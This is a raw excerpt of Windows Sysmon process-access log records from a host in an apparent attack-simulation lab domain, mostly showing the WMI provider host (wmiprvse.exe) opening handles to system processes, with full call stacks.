16:52:51.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236334Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236333Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236332Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236331Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236330Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236329Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236328Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.653{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236327Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236326Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236325Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236324Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236323Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2C00-00000000AD01}2516C:\Windows\system32\DFSRs.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236322Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2A00-00000000AD01}2644C:\Windows\System32\ismserv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236321Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2900-00000000AD01}2700C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236320Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236319Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2700-00000000AD01}2776C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236318Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-6DAA-00000000AD01}2536C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236317Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-6DAA-00000000AD01}2536C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236316Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2600-00000000AD01}2596C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236315Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:51.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2500-00000000AD01}2284C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236314Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 